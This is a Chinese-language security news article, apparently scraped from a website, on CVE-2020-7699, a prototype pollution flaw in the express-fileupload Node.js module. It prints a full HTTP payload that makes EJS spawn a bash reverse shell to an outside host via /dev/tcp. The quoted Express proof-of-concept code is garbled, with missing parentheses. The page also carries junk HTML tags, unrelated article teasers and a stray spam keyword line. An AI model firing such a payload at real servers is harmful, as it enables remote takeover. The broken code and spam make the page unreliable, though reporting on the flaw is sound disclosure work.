<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    下載超過 730 萬次的 Node.js 模塊存在 DoS 攻擊和代碼注入漏洞

    Andrew2020-08-06 10:53:22

    專家在流行的NodeJS模塊中發現了一個漏洞,該漏洞可以使攻擊者對服務器執行拒絕服務(DoS)攻擊或注入任意代碼。

    該漏洞 CVE 編號為CVE-2020-7699,位于 express-fileupload npm 組件中。NodeJS模塊受“Prototype Pollution(原型污染)” CVE-2020-7699漏洞的影響,該漏洞可能允許攻擊者在服務器上執行拒絕服務(DoS)攻擊或注入任意代碼。

    NodeJS模塊“express-fileupload” 從npm存儲庫下載的內容超過730萬次。

    讀取NIST的內容:“這會影響1.1.8之前的包express-fileupload。如果啟用了parseNested選項,則發送損壞的HTTP請求可能導致拒絕服務或任意代碼執行。”

    不幸的是,實際安裝數量可能會更多,因為開發人員可以從其他存儲庫(包括GitHub和鏡像網站)下載模塊。

    原型用于定義JavaScript對象的缺省結構和默認值,當未設置任何值時,它們對于指定期望的結構至關重要。能夠修改JavaScript對象原型的攻擊者如果沒有收到預期值,可能會使應用程序崩潰并更改行為。

    由于JavaScript的傳播,利用原型污染缺陷可能會對Web應用程序造成嚴重后果。

    原型攻擊包括將不兼容類型的對象注入現有對象中,以觸發可能導致拒絕服務(DoS)條件或任意代碼執行(包括建立遠程外殼)的錯誤。

    據發現該漏洞的安全研究員Posix稱,該問題利用了express-fileupload實現的“ parseNested”功能。

    express-fileupload模塊實現了幾個用于在nodejs應用程序中上傳和管理文件的選項。選項之一是parseNested,它使參數扁平化為嵌套對象。

    閱讀 Posix發布的帖子可知:

    因此,如果我們提供{"a.b.c": true}作為輸入,在內部它將被用作{"a": {"b": {"c": true}}}

    下面是“parseNested”選項的代碼:

    const express = require('express'; 
    const fileUpload = require('express-fileupload'; 
    const app = express(); 
    
    app.use(fileUpload({parseNested:true})); 
    
    app.get'/',(req,res)=> { 
        res.end('express-fileupload poc'; 
    }; 
    
    app.listen(7777

    在“ Content-Disposition” HTTP標頭中提供有效負載后,攻擊者可以提供“ __proto __.toString”值來觸發攻擊。

    “因此,使用上述表單中的

    express-fileupload

    配置和運行express服務器。帖子繼續寫道。

    RlpBedAnvW.png!large

    “ __proto __ ” 賦值函數可用于修改所有JS對象和結構所繼承的JavaScript的“Prototype”屬性。

    這意味著上述HTTP請求將覆蓋并破壞用戶代碼中存在的每個對象的內置“toString”方法 。

    “如果Object.prototype.toString可以被污染,則將導致錯誤,并且對于每個請求,express [sic]始終返回500錯誤,”研究人員繼續說道。

    研究人員還解釋說,攻擊者可以利用相同的漏洞在易受攻擊的系統上獲得一個shell。對于這種攻擊形式,有必要使應用程序使用的易受攻擊的“express-fileupload”版本也使用模板引擎EJS(嵌入式JavaScript模板)。

    “在Express應用程序中通過原型解決方案獲取shell的最簡單方法是使用ejs。是的,應用程序是否應使用ejs模板引擎存在局限性。”專家繼續說。

    攻擊者可以通過發送覆蓋EJS的“ outputFunctionName”選項的HTTP請求來觸發問題。

    下面的有效負載利用了express-fileupload中的原型污染,并指示EJS(應在使用中)執行NodeJS “ child_process”。此過程可用于獲取攻擊者計算機的反向shell。

    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=--------1566035451
    Content-Length: 221
    
    ----------1566035451
    Content-Disposition: form-data; name="__proto__.outputFunctionName";
    
    x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"');x
    ----------1566035451--

    好消息是,在收到研究人員的報告后,“express-fileupload”立即修復了該漏洞。建議用戶從npm存儲庫中獲取最新的1.1.9版本。

    軟件dos攻擊
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    四重勒索漸成主流,平均贖金支出逐年暴漲。
    思科宣布,Snort檢測引擎中的漏洞使其某些產品遭受拒絕服務攻擊。漏洞跟蹤為CVE-2021-1285,未經身份驗證的鄰近攻擊者可以利用此漏洞,通過向其發送特制的以太網幀來觸發DoS條件。閱讀思科發布的建議。“成功利用漏洞可以使攻擊者耗盡受影響設備上的磁盤空間,這可能導致管理員無法登錄到該設備或該設備無法正確啟動。”該漏洞已被評為高度嚴重,其CVSS評分為。CVE-2021-1285漏洞影響早于版的所有開源Snort項目版本。
    霍尼韋爾 Experion 過程知識系統 (PKS) 是一種在全球和不同行業中廣泛采用的 DCS。 這個龐大的自動化平臺集成了來自整個環境的控制器的數據,提供了全廠流程的集中視圖。 該系統主要使用 C200、C300 和 ACE 控制器,可通過霍尼韋爾工程工作站軟件 Experion PKS Configuration Studio 進行編程。 然后可以將邏輯(開發為框圖)從工程工作站下載到 DC
    未來的勒索軟件攻擊是什么樣的?企業如何實現自身安全防護? 在過去十年左右的時間里,勒索軟件已經逐漸發展成熟——從最初相對簡單的病毒,到現在有能力削弱全球醫療保健系統、干擾燃料供應鏈或破壞交通基礎設施。它對惡意行為者的巨大吸引力在于其簡單易操作。勒索軟件攻擊無需特別復雜的操作即可實現大規模破壞,同時為犯罪分子賺取豐厚的贖金。出于這個原因,此類攻擊的數量未來仍將加速增長。
    Printjack打印機攻擊
    2021-12-03 08:58:17
    研究人員發現過度信任打印機會引發DDoS攻擊、隱私泄露等威脅。 意大利研究人員在最新研究成果中指出,當前打印機存在一些基本漏洞,且在網絡安全和數據隱私合規方面落后于其他IoT和電子設備。通過評估網絡安全風險和隱私威脅,研究人員發現針對打印機可以發起一系列攻擊——Printjack,包括將打印機納入DDoS網絡、執行隱私泄露攻擊等。
    據外媒,以色列安全咨詢企業JSOF在最新的報告中披露了7個Dnsmasq漏洞,并指出攻擊者通過漏洞劫持了數百萬臺設備。據悉,Dnsmasq是一套開源的DNS轉發軟件,能夠為運行該軟件的網絡設備添加DNS緩存和DHCP服務器功能。
    近日,APC的Easy UPS在線監控軟件曝出未經身份驗證即可執行任意遠程代碼(RCE)的漏洞,黑客能夠接管設備,在最糟糕的情況下,完全禁用其功能。
    目前,云原生場景下,攻擊者的主要動機是劫持資源進行挖礦和DoS攻擊。由于這種攻擊行為會導致性能下降,MITRE ATT&CK框架將其定義為資源劫持。此外,攻擊者還會利用受信的基礎鏡像。這種攻擊手法復雜程度最高。使用官方鏡像提高了攻擊按計劃執行的可能性,因為大多數情況下,這些鏡像是預先批準可以使用的。
    DDOS簡介DDOS又稱為分布式拒絕服務,全稱是Distributed Denial of Service。DDOS本是利用合理的請求造成資源過載,導致服務不可用,從而造成服務器拒絕正常流量服務。拒絕服務攻擊處理流程現象分析:根據發現的現象、網絡設備和服務的情況初步判斷是否存在拒絕服務攻擊
    從2022年1月到7月,Sysdig威脅研究團隊實施了一個全球蜜網系統,通過多個攻擊載體捕獲了大量漏洞。如何防范暴力破解DDoS攻擊首先,確保Web服務器免受暴力攻擊是很重要的。攻擊者的目標是訪問服務器或暫時使其失去響應。檢測賬戶接管欺詐主要的威脅檢測解決方案之一是監視應用程序的登錄頁面,以防止使用受損憑證對用戶帳戶進行未經授權的訪問。賬戶接管是一種在線非法活動,攻擊者在未經授權的情況下訪問用戶的賬戶。
    Andrew
    暫無描述
      亚洲 欧美 自拍 唯美 另类